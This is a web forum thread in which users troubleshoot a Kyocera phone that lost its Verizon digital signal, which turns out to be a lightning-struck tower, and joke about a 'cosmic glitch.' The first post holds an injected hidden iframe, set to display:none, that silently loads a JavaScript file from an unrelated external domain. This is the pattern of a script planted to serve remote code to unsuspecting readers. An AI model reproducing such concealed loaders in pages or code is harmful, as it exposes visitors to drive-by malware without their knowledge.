+ Reply to Thread

Not dead, but on life support!

Well, I was writing away on a text message when I suddenly lost my phone connection (Usually full strenth digital at work). I have done a soft reset, but the phone is just "searching for signal". Is there an easy way to check and see if verizon's tower is down? If I go outside I can pick up a faint anolog signal, so I'm thinking it might be the tower. Any suggestions??????
    :anger :anger :anger :anger<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If at first you don't succeed, don't try sky diving.

I had the same thing happen to me about a week ago. The phone just kept searching for a signal. I turned on my old StarTac and it immediately got a strong digital signal. I was pretty sure there was something wrong with the phone and was about to call Kyo support when it found a signal and all was well. The whole thing lasted maybe a half hour. It hasn't happened again. I am chalking it up to a cosmic glitch.

Originally posted by Lnoble
    I had the same thing happen to me about a week ago. The phone just kept searching for a signal. I turned on my old StarTac and it immediately got a strong digital signal. I was pretty sure there was something wrong with the phone and was about to call Kyo support when it found a signal and all was well. The whole thing lasted maybe a half hour. It hasn't happened again. I am chalking it up to a cosmic glitch.
    Ahhh...the cosmic glitch. What a useful concept. I can't begin to count the number of mysteries in my life that have been explained very succinctly by a cosmic glitch. Whatever would we do without it...
    Dave

Well, mine is at 3 hours and counting. Maybe when I go home it'll pick up another tower and I'll find out this tower is out. If not I'll be doing a hard reset tonight.

Off lifesupport

Good news. The tower by my work was struck by lightning. The tower by my home works fine.

Re: Off lifesupport

Originally posted by Steve B.
    Good news. The tower by my work was struck by lightning.
    While I know what you mean, I still got a good chuckle from the combination of these two sentences!

Administrator
    LOL!! i see your point Turbo.. :grofl2

Return of the Cosmic Glitch

After yesterday's discussion of the phone not picking up a signal, it happened to me this morining. (This is the second time for me.) The phone went into analog and I can't get it back to digital. It was consisten on my 16 mile trip to downtown D.C., so I doubted it was VZW. If I change the settings to digital only, it just goes searching. I called VZW and was told they can't help and I have to call Kyo for technical support. So, it looks like I have either been hit by a second cosmic glitch or there is something wrong with the phone. I am now going to call Kyo.

Re: Re: Off lifesupport

Originally posted by turboCat
    While I know what you mean, I still got a good chuckle from the combination of these two sentences!
    lol - I guess I'd prefer to find Saddam hiding WMD in my back yard as opposed to something wrong with my precious 7135.